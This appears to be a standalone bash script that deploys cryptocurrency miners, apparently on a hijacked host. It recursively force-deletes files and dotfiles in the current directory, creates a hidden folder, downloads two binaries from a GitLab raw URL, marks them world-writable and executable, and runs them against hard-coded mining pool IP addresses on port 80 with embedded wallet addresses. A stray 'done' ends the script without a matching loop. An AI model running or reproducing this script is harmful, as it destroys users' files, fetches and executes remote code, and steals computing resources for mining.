#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://64.225.25.181:80 -u uu22UXrqx5a6mUP1oX9yY4seLZEZi25no1.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lol1.81
chmod 777 lol1.81

./lol1.81 -a PYRIN -p 138.197.98.18:80 -u pyrin:qryudmznyqgg2dhxzawmjcsjsd06jwfyq5gupmxjhrc04z4k7l8fqjc8zvlda.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
